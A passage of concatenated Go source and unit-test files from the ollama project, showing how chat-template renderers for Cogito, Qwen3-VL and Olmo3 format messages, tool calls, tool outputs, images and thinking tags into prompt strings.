lab based in San Francisco.<|User|>What's the weather in Paris?<|Assistant|><|tool▁calls▁begin|><|tool▁call▁begin|>function<|tool▁sep|>get_weather ` + "```json\n" + `{"location":"Paris"} ` + "```" + `<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁outputs▁begin|><|tool▁output▁begin|>Temperature: 
22°C, Sunny<|tool▁output▁end|><|tool▁outputs▁end|><|Assistant|>`, }, { name: "multiple tool responses", messages: []api.Message{ {Role: "user", Content: "Get weather for Paris and London"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "London", }), }, }, }, }, {Role: "tool", Content: "Paris: 22°C, Sunny"}, {Role: "tool", Content: "London: 18°C, Cloudy"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Get weather for Paris and London<|Assistant|><|tool▁calls▁begin|><|tool▁call▁begin|>function<|tool▁sep|>get_weather ` + "```json\n" + `{"location":"Paris"} ` + "```" + `<|tool▁call▁end|> <|tool▁call▁begin|>function<|tool▁sep|>get_weather ` + "```json\n" + `{"location":"London"} ` + "```" + `<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁outputs▁begin|><|tool▁output▁begin|>Paris: 22°C, Sunny<|tool▁output▁end|> <|tool▁output▁begin|>London: 18°C, Cloudy<|tool▁output▁end|><|tool▁outputs▁end|><|Assistant|>`, }, { name: "thinking with tools", messages: []api.Message{ {Role: "user", Content: "What's the weather like?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. 
You have the following functions available: ` + "```json\n" + `{ "type": "function", "function": { "name": "get_weather", "description": "Get current weather", "parameters": { "type": "object", "required": [ "location" ], "properties": { "location": { "type": "string", "description": "City name" } } } } } ` + "```\n" + `<|User|>What's the weather like?<|Assistant|><think> `, }, // test cases based on cogito { name: "single_turn_thinking_false", messages: []api.Message{ {Role: "user", Content: "Hello"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello<|Assistant|>`, }, { name: "single_turn_thinking_true", messages: []api.Message{ {Role: "user", Content: "Hello"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello<|Assistant|><think> `, }, { name: "multi_turn_thinking_false", messages: []api.Message{ {Role: "user", Content: "Hello"}, {Role: "assistant", Content: "Hi there!"}, {Role: "user", Content: "How are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello<|Assistant|>Hi there!<|end▁of▁sentence|><|User|>How are you?<|Assistant|>`, }, { name: "multi_turn_thinking_true", messages: []api.Message{ {Role: "user", Content: "Hello"}, {Role: "assistant", Content: "Hi there!"}, {Role: "user", Content: "How are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. 
You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello<|Assistant|>Hi there!<|end▁of▁sentence|><|User|>How are you?<|Assistant|><think> `, }, { name: "multi_with_system_thinking_false", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant"}, {Role: "user", Content: "Start"}, {Role: "assistant", Content: "Okay"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a helpful assistant<|User|>Start<|Assistant|>Okay<|end▁of▁sentence|><|Assistant|>`, }, { name: "multi_with_system_thinking_true", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant"}, {Role: "user", Content: "Start"}, {Role: "assistant", Content: "Okay"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a helpful assistant <|User|>Start<|Assistant|>Okay<|end▁of▁sentence|><|Assistant|><think> `, }, { name: "multi_with_system2_thinking_false", messages: []api.Message{ {Role: "system", Content: "You are a pirate chatbot who always responds in pirate speak!"}, {Role: "user", Content: "Give me a short introduction to LLMs."}, {Role: "assistant", Content: "Arrr! I'm a pirate"}, {Role: "user", Content: "Tell me more about LLMs."}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a pirate chatbot who always responds in pirate speak!<|User|>Give me a short introduction to LLMs.<|Assistant|>Arrr! 
I'm a pirate<|end▁of▁sentence|><|User|>Tell me more about LLMs.<|Assistant|>`, }, { name: "multi_with_system2_thinking_true", messages: []api.Message{ {Role: "system", Content: "You are a pirate chatbot who always responds in pirate speak!"}, {Role: "user", Content: "Give me a short introduction to LLMs."}, {Role: "assistant", Content: "Arrr! I'm a pirate"}, {Role: "user", Content: "Tell me more about LLMs."}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a pirate chatbot who always responds in pirate speak! <|User|>Give me a short introduction to LLMs.<|Assistant|>Arrr! I'm a pirate<|end▁of▁sentence|><|User|>Tell me more about LLMs.<|Assistant|><think> `, }, // tools { name: "tool_calls_only_no_content", messages: []api.Message{ {Role: "user", Content: "Get weather for Paris"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Get weather for Paris<|Assistant|><|tool▁calls▁begin|><|tool▁call▁begin|>function<|tool▁sep|>get_weather ` + "```json\n" + `{"location":"Paris"} ` + "```" + `<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|Assistant|>`, }, { name: "complex_tool_arguments", messages: []api.Message{ {Role: "user", Content: "Process complex data"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "process_data", Arguments: testArgsOrdered([]orderedArg{ {"config", map[string]any{ "enabled": true, "threshold": 0.95, "tags": []string{"important", "urgent"}, }}, {"items", []any{"item1", "item2", "item3"}}, }), }, }, }, }, }, 
thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Process complex data<|Assistant|><|tool▁calls▁begin|><|tool▁call▁begin|>function<|tool▁sep|>process_data ` + "```json\n" + `{"config":{"enabled":true,"tags":["important","urgent"],"threshold":0.95},"items":["item1","item2","item3"]} ` + "```" + `<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|Assistant|>`, }, { name: "empty_messages", messages: []api.Message{ {Role: "system", Content: ""}, {Role: "user", Content: "Hello"}, {Role: "assistant", Content: ""}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello<|Assistant|><|end▁of▁sentence|><|Assistant|>`, }, { name: "thinking_with_empty_assistant_content", messages: []api.Message{ {Role: "user", Content: "Think about this"}, {Role: "assistant", Content: ""}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Think about this<|Assistant|><|end▁of▁sentence|><|Assistant|><think> `, }, { name: "multiple_system_messages", messages: []api.Message{ {Role: "system", Content: "First instruction"}, {Role: "system", Content: "Second instruction"}, {Role: "user", Content: "Hello"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. 
First instruction<|User|>Hello<|Assistant|>`, }, { name: "special_characters_in_content", messages: []api.Message{ {Role: "user", Content: "What about <|special|> tokens and \"quotes\"?"}, {Role: "assistant", Content: "They're handled normally in content."}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>What about <|special|> tokens and "quotes"?<|Assistant|>They're handled normally in content.<|end▁of▁sentence|><|Assistant|>`, }, { name: "long_conversation_multiple_rounds", messages: []api.Message{ {Role: "user", Content: "Hi"}, {Role: "assistant", Content: "Hello!"}, {Role: "user", Content: "How are you?"}, {Role: "assistant", Content: "Good, thanks!"}, {Role: "user", Content: "What's the weather?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hi<|Assistant|>Hello!<|end▁of▁sentence|><|User|>How are you?<|Assistant|>Good, thanks!<|end▁of▁sentence|><|User|>What's the weather?<|Assistant|>`, }, } renderer := &CogitoRenderer{isThinking: true} for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := renderer.Render(tt.messages, tt.tools, tt.thinkValue) if err != nil { t.Fatalf("Render() error = %v", err) } if diff := cmp.Diff(tt.expected, rendered); diff != "" { t.Errorf("Render() mismatch (-want +got):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/qwen3vl_nonthinking_test.go
model/renderers/qwen3vl_nonthinking_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestQwen3VLNonThinkingRenderer(t *testing.T) { tests := []struct { name string msgs []api.Message images []api.ImageData tools []api.Tool useImgTags bool expected string }{ { name: "prefill", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Tell me something interesting."}, {Role: "assistant", Content: "I'll tell you something interesting about cats"}, }, expected: `<|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Tell me something interesting.<|im_end|> <|im_start|>assistant I'll tell you something interesting about cats`, }, { name: "basic", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, expected: `<|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Hello, how are you?<|im_end|> <|im_start|>assistant `, }, { name: "With thinking, end assistant.", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Content: "abc<think>To make this story interesting, I will speak in poetry.</think>"}, // does the thinking even work? 
}, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant abc<think>To make this story interesting, I will speak in poetry.</think>`, }, { name: "Multiple thinking", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Content: "abc<think>To make this story interesting, I will speak in poetry.</think><think>And I will speak in poetry after the first sentence.</think>"}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant abc<think>To make this story interesting, I will speak in poetry.</think><think>And I will speak in poetry after the first sentence.</think>`, // NOTE: the second thinking tag is not captured }, { name: "Multiple thinking, multiple messages.", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Content: "abc<think>To make this story interesting, I will speak in poetry.</think><think>And I will speak in poetry after the first sentence.</think>"}, {Role: "user", Content: "What is the weather like in San Francisco? <think>I will check the weather in San Francisco for you.</think>"}, {Role: "assistant", Content: "I'll check the weather in San Francisco for you.<think>Speak poetry after the first sentence.</think><think>Speak poetry after the second sentence.</think>"}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant abc<think>To make this story interesting, I will speak in poetry.</think><think>And I will speak in poetry after the first sentence.</think><|im_end|> <|im_start|>user What is the weather like in San Francisco? 
<think>I will check the weather in San Francisco for you.</think><|im_end|> <|im_start|>assistant I'll check the weather in San Francisco for you.<think>Speak poetry after the first sentence.</think><think>Speak poetry after the second sentence.</think>`, }, { name: "Image", msgs: []api.Message{ {Role: "user", Content: "Describe this image.", Images: []api.ImageData{api.ImageData("img2")}}, {Role: "assistant", Content: "Let me analyze this image."}, }, expected: `<|im_start|>user <|vision_start|><|image_pad|><|vision_end|>Describe this image.<|im_end|> <|im_start|>assistant Let me analyze this image.`, }, { name: "Image with image tags", msgs: []api.Message{ {Role: "user", Content: "Describe this image.", Images: []api.ImageData{api.ImageData("img2")}}, {Role: "assistant", Content: "Let me analyze this image."}, }, useImgTags: true, expected: `<|im_start|>user [img]Describe this image.<|im_end|> <|im_start|>assistant Let me analyze this image.`, }, { name: "Multiple images", msgs: []api.Message{ {Role: "user", Content: "Describe these images.", Images: []api.ImageData{api.ImageData("img1"), api.ImageData("img2")}}, }, expected: `<|im_start|>user <|vision_start|><|image_pad|><|vision_end|><|vision_start|><|image_pad|><|vision_end|>Describe these images.<|im_end|> <|im_start|>assistant `, }, { name: "Multiple images with image tags", msgs: []api.Message{ {Role: "user", Content: "Describe these images.", Images: []api.ImageData{api.ImageData("img1"), api.ImageData("img2")}}, {Role: "assistant", Content: "Let me analyze this image."}, }, useImgTags: true, expected: `<|im_start|>user [img][img]Describe these images.<|im_end|> <|im_start|>assistant Let me analyze this image.`, }, // // NOTE: solved with #12518: https://github.com/ollama/ollama/compare/main...drifkin/stable-tool-args // { // name: "with tools and response", // msgs: []api.Message{ // {Role: "system", Content: "You are a helpful assistant with access to tools."}, // {Role: "user", Content: "What's the 
weather like in New York?"}, // { // Role: "assistant", // Content: "I'll check the weather in New York for you.", // ToolCalls: []api.ToolCall{ // { // Function: api.ToolCallFunction{ // Name: "get-current-weather", // Arguments: map[string]any{ // "location": "New York", // "unit": "fahrenheit", // }, // }, // }, // }, // }, // {Role: "tool", Content: "80", ToolName: "get-current-weather"}, // {Role: "user", Content: "That sounds nice! What about San Francisco?"}, // }, // tools: []api.Tool{ // { // Type: "function", // Function: api.ToolFunction{ // Name: "get-current-weather", // Description: "Get the current weather for a location", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"location"}, // Properties: map[string]api.ToolProperty{ // "location": { // Type: api.PropertyType{"string"}, // Description: "The city and state, e.g. San Francisco, CA", // }, // "unit": { // Type: api.PropertyType{"string"}, // Enum: []any{"celsius", "fahrenheit"}, // Description: "The temperature unit", // }, // }, // }, // }, // }, // }, // expected: `<|im_start|>system // You are a helpful assistant with access to tools. // # Tools // You may call one or more functions to assist with the user query. // You are provided with function signatures within <tools></tools> XML tags: // <tools> // {"type": "function", "function": {"name": "get-current-weather", "description": "Get the current weather for a location", "parameters": {"type": "object", "properties": {"location": {"type": "string", "description": "The city and state, e.g. 
San Francisco, CA"}, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"], "description": "The temperature unit"}}, "required": ["location"]}}} // </tools> // For each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags: // <tool_call> // {"name": <function-name>, "arguments": <args-json-object>} // </tool_call><|im_end|> // <|im_start|>user // What's the weather like in New York?<|im_end|> // <|im_start|>assistant // I'll check the weather in New York for you. // <tool_call> // {"name": "get-current-weather", "arguments": {"location": "New York", "unit": "fahrenheit"}} // </tool_call><|im_end|> // <|im_start|>user // <tool_response> // 80 // </tool_response><|im_end|> // <|im_start|>user // That sounds nice! What about San Francisco?<|im_end|> // <|im_start|>assistant // `, // }, // // NOTE: solved with #12518: https://github.com/ollama/ollama/compare/main...drifkin/stable-tool-args // { // name: "With tools and response, multiple tool calls", // msgs: []api.Message{ // { // Role: "system", // Content: "You are a helpful assistant with access to tools.", // }, // { // Role: "user", // Content: "Call two tools for me: add and multiply.", // }, // { // Role: "assistant", // Content: "Sure, I'll call both tools for you.", // ToolCalls: []api.ToolCall{ // { // Function: api.ToolCallFunction{ // Name: "add", // Arguments: map[string]any{ // "a": 2, // "b": 3, // }, // }, // }, // { // Function: api.ToolCallFunction{ // Name: "multiply", // Arguments: map[string]any{ // "x": 4, // "y": 5, // }, // }, // }, // }, // }, // { // Role: "tool", // Content: "5", // ToolName: "add", // }, // { // Role: "tool", // Content: "20", // ToolName: "multiply", // }, // { // Role: "user", // Content: "Thanks! 
What are the results?", // }, // }, // tools: []api.Tool{ // { // Type: "function", // Function: api.ToolFunction{ // Name: "add", // Description: "Add two numbers", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"a", "b"}, // Properties: map[string]api.ToolProperty{ // "a": {Type: api.PropertyType{"integer"}, Description: "First number"}, // "b": {Type: api.PropertyType{"integer"}, Description: "Second number"}, // }, // }, // }, // }, // { // Type: "function", // Function: api.ToolFunction{ // Name: "multiply", // Description: "Multiply two numbers", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"x", "y"}, // Properties: map[string]api.ToolProperty{ // "x": {Type: api.PropertyType{"integer"}, Description: "First factor"}, // "y": {Type: api.PropertyType{"integer"}, Description: "Second factor"}, // }, // }, // }, // }, // }, // expected: `<|im_start|>system // You are a helpful assistant with access to tools. // # Tools // You may call one or more functions to assist with the user query. 
// You are provided with function signatures within <tools></tools> XML tags: // <tools> // {"type": "function", "function": {"name": "add", "description": "Add two numbers", "parameters": {"type": "object", "properties": {"a": {"type": "integer"}, "b": {"type": "integer"}}, "required": ["a", "b"]}}} // {"type": "function", "function": {"name": "multiply", "description": "Multiply two numbers", "parameters": {"type": "object", "properties": {"x": {"description": "First factor"}, "y": {"description": "Second factor"}}, "required": ["x", "y"]}}} // </tools> // For each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags: // <tool_call> // {"name": <function-name>, "arguments": <args-json-object>} // </tool_call><|im_end|> // <|im_start|>user // Call two tools for me: add and multiply.<|im_end|> // <|im_start|>assistant // Sure, I'll call both tools for you. // <tool_call> // {"name": "add", "arguments": {"a": 2, "b": 3}} // </tool_call> // <tool_call> // {"name": "multiply", "arguments": {"x": 4, "y": 5}} // </tool_call><|im_end|> // <|im_start|>user // <tool_response> // 5 // </tool_response> // <tool_response> // 20 // </tool_response><|im_end|> // <|im_start|>user // Thanks! What are the results?<|im_end|> // <|im_start|>assistant // `, // }, { name: "user tool_response block preserved", msgs: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", Content: "I'll check.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}}, }, }, {Role: "user", Content: "<tool_response>\n18\n</tool_response>"}, {Role: "user", Content: "Thanks!"}, }, expected: `<|im_start|>user What's the weather?<|im_end|> <|im_start|>assistant I'll check. 
<tool_call> {"name": "get-current-weather", "arguments": {"location": "Paris", "unit": "celsius"}} </tool_call><|im_end|> <|im_start|>user <tool_response> 18 </tool_response><|im_end|> <|im_start|>user Thanks!<|im_end|> <|im_start|>assistant `, }, { name: "assistant with multiple tool calls and content", msgs: []api.Message{ {Role: "user", Content: "Hi"}, { Role: "assistant", Content: "before", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "add", Arguments: testArgsOrdered([]orderedArg{{"a", 2}, {"b", 3}})}}, {Function: api.ToolCallFunction{Name: "mul", Arguments: testArgsOrdered([]orderedArg{{"x", 4}, {"y", 5}})}}, }, }, }, expected: `<|im_start|>user Hi<|im_end|> <|im_start|>assistant before <tool_call> {"name": "add", "arguments": {"a": 2, "b": 3}} </tool_call> <tool_call> {"name": "mul", "arguments": {"x": 4, "y": 5}} </tool_call>`, }, { name: "consecutive tool responses grouped", msgs: []api.Message{ {Role: "user", Content: "Compute results"}, {Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "job", Arguments: testArgs(map[string]any{"n": 1})}}}}, {Role: "tool", Content: "5", ToolName: "job"}, {Role: "tool", Content: "6", ToolName: "job"}, }, expected: `<|im_start|>user Compute results<|im_end|> <|im_start|>assistant ok <tool_call> {"name": "job", "arguments": {"n": 1}} </tool_call><|im_end|> <|im_start|>user <tool_response> 5 </tool_response> <tool_response> 6 </tool_response><|im_end|> <|im_start|>assistant `, }, { name: "last message is tool then prefill", msgs: []api.Message{ {Role: "user", Content: "run"}, {Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "exec", Arguments: testArgs(map[string]any{"cmd": "ls"})}}}}, {Role: "tool", Content: "done", ToolName: "exec"}, }, expected: `<|im_start|>user run<|im_end|> <|im_start|>assistant ok <tool_call> {"name": "exec", "arguments": {"cmd": "ls"}} </tool_call><|im_end|> <|im_start|>user 
<tool_response> done </tool_response><|im_end|> <|im_start|>assistant `, }, { name: "user with multiple images", msgs: []api.Message{ {Role: "user", Content: "Describe.", Images: []api.ImageData{api.ImageData("img1"), api.ImageData("img2")}}, }, expected: `<|im_start|>user <|vision_start|><|image_pad|><|vision_end|><|vision_start|><|image_pad|><|vision_end|>Describe.<|im_end|> <|im_start|>assistant `, }, { name: "user tool_response, no whitespace", msgs: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", Content: "I'll check.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}}, }, }, {Role: "user", Content: "<tool_response>\n18\n</tool_response>"}, {Role: "user", Content: "Thanks!"}, }, expected: `<|im_start|>user What's the weather?<|im_end|> <|im_start|>assistant I'll check. <tool_call> {"name": "get-current-weather", "arguments": {"location": "Paris", "unit": "celsius"}} </tool_call><|im_end|> <|im_start|>user <tool_response> 18 </tool_response><|im_end|> <|im_start|>user Thanks!<|im_end|> <|im_start|>assistant `, }, { name: "user tool_response with surrounding whitespace", msgs: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", Content: "I'll check.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}}, }, }, {Role: "user", Content: "\n\n\n\n<tool_response>\n18\n</tool_response> extra\n\n\n\n\n\n"}, }, expected: `<|im_start|>user What's the weather?<|im_end|> <|im_start|>assistant I'll check. 
<tool_call> {"name": "get-current-weather", "arguments": {"location": "Paris", "unit": "celsius"}} </tool_call><|im_end|> <|im_start|>user <tool_response> 18 </tool_response> extra <|im_end|> <|im_start|>assistant `, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := (&Qwen3VLRenderer{isThinking: false, useImgTags: tt.useImgTags}).Render(tt.msgs, tt.tools, nil) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/cogito.go
model/renderers/cogito.go
package renderers import ( "encoding/json" "strings" "github.com/ollama/ollama/api" ) type CogitoRenderer struct { isThinking bool } func (r *CogitoRenderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) { var sb strings.Builder defaultPrompt := "You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco." // thinking is enabled: model must support it AND user must request it (true) enableThinking := r.isThinking && (thinkValue != nil && thinkValue.Bool()) var systemPrompt string var conversationMessages []api.Message if len(messages) > 0 && messages[0].Role == "system" { systemPrompt = messages[0].Content conversationMessages = messages[1:] } else { conversationMessages = messages } var finalSystemPrompt string if enableThinking { finalSystemPrompt = "Enable deep thinking subroutine.\n\n" + defaultPrompt if systemPrompt != "" { finalSystemPrompt += "\n\n" + systemPrompt + "\n\n" } } else { finalSystemPrompt = defaultPrompt if systemPrompt != "" { finalSystemPrompt += "\n\n" + systemPrompt } } if len(tools) > 0 { if finalSystemPrompt != "" { finalSystemPrompt += "\nYou have the following functions available:\n" } else { finalSystemPrompt = "You have the following functions available:\n" } for _, tool := range tools { toolJSON, _ := json.MarshalIndent(tool, "", " ") // TODO(gguo): double check json format finalSystemPrompt += "```json\n" + string(toolJSON) + "\n```\n" } } sb.WriteString("<|begin▁of▁sentence|>" + finalSystemPrompt) outputsOpen := false isLastUser := false for i, message := range conversationMessages { switch message.Role { case "user": isLastUser = true sb.WriteString("<|User|>" + message.Content + "<|Assistant|>") case "assistant": isLastUser = false if len(message.ToolCalls) > 0 { if message.Content != "" { sb.WriteString(message.Content) } sb.WriteString("<|tool▁calls▁begin|>") for j, toolCall := range message.ToolCalls { 
sb.WriteString("<|tool▁call▁begin|>function<|tool▁sep|>" + toolCall.Function.Name) argsJSON, _ := json.Marshal(toolCall.Function.Arguments) sb.WriteString("\n```json\n" + string(argsJSON) + "\n```") sb.WriteString("<|tool▁call▁end|>") if j < len(message.ToolCalls)-1 { sb.WriteString("\n") } } sb.WriteString("<|tool▁calls▁end|><|end▁of▁sentence|>") } else { sb.WriteString(message.Content + "<|end▁of▁sentence|>") } case "tool": isLastUser = false if !outputsOpen { sb.WriteString("<|tool▁outputs▁begin|>") outputsOpen = true } sb.WriteString("<|tool▁output▁begin|>" + message.Content + "<|tool▁output▁end|>") hasNextTool := i+1 < len(conversationMessages) && conversationMessages[i+1].Role == "tool" if hasNextTool { sb.WriteString("\n") } else { sb.WriteString("<|tool▁outputs▁end|>") outputsOpen = false } } } if outputsOpen { sb.WriteString("<|tool▁outputs▁end|>") } if !isLastUser { sb.WriteString("<|Assistant|>") } if enableThinking { sb.WriteString("<think>\n") } return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/olmo3_test.go
model/renderers/olmo3_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestOlmo3Renderer(t *testing.T) { tests := []struct { name string msgs []api.Message tools []api.Tool expected string }{ { name: "basic without system - adds default system", msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful function-calling AI assistant. You do not currently have access to any functions. <functions></functions><|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n", }, { name: "with system message no tools", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful assistant.<|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n", }, { name: "with system message and tools", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What is the weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"location"}, Properties: testPropsMap(map[string]api.ToolProperty{ "location": {Type: api.PropertyType{"string"}, Description: "The city"}, }), }, }, }, }, expected: "<|im_start|>system\n" + `You are a helpful assistant.<functions>[{"type": "function", "function": {"name": "get_weather", "description": "Get the current weather", "parameters": {"type": "object", "required": ["location"], "properties": {"location": {"type": "string", "description": "The city"}}}}}]</functions><|im_end|>` + "\n" + "<|im_start|>user\n" + "What is the weather?<|im_end|>\n" + "<|im_start|>assistant\n", }, { name: "default system with tools - includes function instruction", msgs: []api.Message{ {Role: "user", Content: "What is the 
weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"location"}, Properties: testPropsMap(map[string]api.ToolProperty{ "location": {Type: api.PropertyType{"string"}, Description: "The city"}, }), }, }, }, }, expected: "<|im_start|>system\n" + "You are a helpful function-calling AI assistant. " + "You are provided with function signatures within <functions></functions> XML tags. You may call one or more functions to assist with the user query. Output any function calls within <function_calls></function_calls> XML tags. Do not make assumptions about what values to plug into functions." + `<functions>[{"type": "function", "function": {"name": "get_weather", "description": "Get the current weather", "parameters": {"type": "object", "required": ["location"], "properties": {"location": {"type": "string", "description": "The city"}}}}}]</functions><|im_end|>` + "\n" + "<|im_start|>user\n" + "What is the weather?<|im_end|>\n" + "<|im_start|>assistant\n", }, { name: "assistant with tool calls - function call syntax", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What is the weather in SF?"}, { Role: "assistant", Content: "Let me check the weather.", ToolCalls: []api.ToolCall{ { ID: "call_1", Function: 